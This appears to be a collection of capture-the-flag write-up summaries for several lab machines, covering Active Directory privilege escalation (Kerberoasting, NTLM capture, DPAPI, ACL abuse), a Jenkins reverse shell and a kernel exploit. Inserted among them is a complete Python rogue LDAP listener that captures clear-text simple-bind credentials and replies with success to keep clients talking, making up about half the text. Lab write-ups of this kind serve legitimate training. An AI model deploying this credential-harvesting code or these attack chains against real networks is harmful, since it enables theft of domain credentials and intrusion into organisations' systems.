City Council (Windows Medium)
Starting with just an open web server, I harvested potential usernames from the City Council portal with a quick curl | html2text. The real breakthrough came when I downloaded a .bin application from the site: it authenticated to the domain controller right in front of me. By resolving the DC's hostname to my own machine and listening on port 389, I captured credentials for svc_services_portal. From there it was classic AD attacks: Kerberoasting got me clerk.john, who had write access to an Uploads share. Deploying the slinky module triggered NTLM authentication from jon.peters, whose cracked credentials revealed GenericWrite over three users. Targeted Kerberoasting of those users cracked the password for nina.soto, who could read the Backups share. Inside .wim profile backups I found DPAPI-protected credentials, decrypted to reveal emma.hayes with powerful ACL controls. Critical clue: buried inside the sam.brooks profile backup was an email (message_sam.eml) warning that...
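The port 389 trick above works because a client doing an LDAP simple bind sends the DN and password in clear text, so anything answering on the spoofed hostname can read them straight out of the first PDU. The following is an added example, not code from the writeup: a minimal BER parser for the LDAPv3 BindRequest plus a one-shot listener that logs the credential and replies with a success BindResponse so the client carries on. The account name and password in the test are constructed sample values, and the listener assumes the whole BindRequest arrives in one recv() (true for the small PDUs a bind produces). A SASL bind (tag 0xA3) carries no plaintext secret and is reported as None.

```python
"""Capture an LDAP simple bind: parse the BindRequest PDU and answer it (added example)."""
import socket
from typing import Optional, Tuple


def _read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Read one BER TLV at buf[pos]; return (tag, value, position after it)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long-form length: next n bytes hold it
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def _encode_len(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, value: bytes) -> bytes:
    return bytes([tag]) + _encode_len(len(value)) + value


def build_bind_request(msg_id: int, name: bytes, password: bytes) -> bytes:
    """Encode what a naive client sends on 389: LDAPMessage{msgid, [APPLICATION 0] BindRequest}.
    msg_id is assumed to be < 128 so it fits a one-byte INTEGER."""
    bind = _tlv(0x02, bytes([3])) + _tlv(0x04, name) + _tlv(0x80, password)
    return _tlv(0x30, _tlv(0x02, bytes([msg_id])) + _tlv(0x60, bind))


def parse_bind_request(pdu: bytes) -> Optional[dict]:
    """Return {'msg_id', 'version', 'name', 'password'} for a simple bind, else None."""
    tag, msg, _ = _read_tlv(pdu, 0)
    if tag != 0x30:                         # not an LDAPMessage SEQUENCE
        return None
    tag, mid, pos = _read_tlv(msg, 0)
    if tag != 0x02:
        return None
    tag, bind, _ = _read_tlv(msg, pos)
    if tag != 0x60:                         # not [APPLICATION 0] BindRequest
        return None
    _, ver, pos = _read_tlv(bind, 0)
    _, name, pos = _read_tlv(bind, pos)
    tag, cred, _ = _read_tlv(bind, pos)
    if tag != 0x80:                         # SASL bind (0xA3): nothing in clear to log
        return None
    return {
        "msg_id": int.from_bytes(mid, "big"),
        "version": ver[0],
        "name": name.decode(errors="replace"),
        "password": cred.decode(errors="replace"),
    }


def build_bind_response(msg_id: int, result_code: int = 0) -> bytes:
    """[APPLICATION 1] BindResponse: resultCode ENUMERATED, empty matchedDN and diagnosticMessage."""
    body = _tlv(0x0A, bytes([result_code])) + _tlv(0x04, b"") + _tlv(0x04, b"")
    return _tlv(0x30, _tlv(0x02, bytes([msg_id])) + _tlv(0x61, body))


def capture_once(bind_addr: str = "0.0.0.0", port: int = 389) -> Optional[dict]:
    """Accept one client, log its simple bind and answer success so it keeps talking."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_addr, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            creds = parse_bind_request(conn.recv(4096))   # assumes one PDU per recv
            if creds:
                print(f"[+] simple bind from {peer[0]}: {creds['name']} / {creds['password']}")
                conn.sendall(build_bind_response(creds["msg_id"]))
            return creds


if __name__ == "__main__":
    capture_once()      # needs the spoofed DC hostname resolving here and rights to bind 389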
Anomaly
This pair of machines was pretty fun. Starting off on an Ubuntu machine with just two ports open, the scan shows port 8080, and viewing it in a browser shows it is running Jenkins; with a flick of the wrist, admin:admin gets in the door. From here we can go to /script and use Groovy, or create a job and build it. A little reverse shell in the build step gets us on the machine. As the jenkins user, we enumerate to find some binaries with the SUID bit set, and checking our sudo privileges shows one we can run without a password. Coming across a binary called router_config, we pull it back to our machine and look at it with strings. It is not a complicated binary (it calls puts), but looking at how it works left room to play, as it didn't sanitize any input. Simply feeding it a little hello world shows we can run a command and get root on this system. From root, we find a keytab file holding only the AES-256 hash for...
ShareThePainAD
This Active Directory machine starts off with ZERO CREDENTIALS. The initial scan shows the normal ports open for a server. We first check SMB and find guest authentication to a 'Share' directory with READ and WRITE access. After uploading a .lnk file there, we capture the hash for bob.ross. Once a BloodHound dump is obtained, we find we have GenericAll over the user alice.wonderland. This can be abused a couple of ways: setting an SPN and targeted Kerberoasting, or simply changing her password. alice.wonderland has access to the box, being in Remote Management Users. After poking around we find a SQL directory at C:\ but no access. Nevertheless, this Windows Server 2022 machine is unpatched: using CVE-2024-35250 to exploit at the kernel level, we are able to obtain SYSTEM via msfconsole.
Initial Scan
PORT STATE SERVICE REASON ...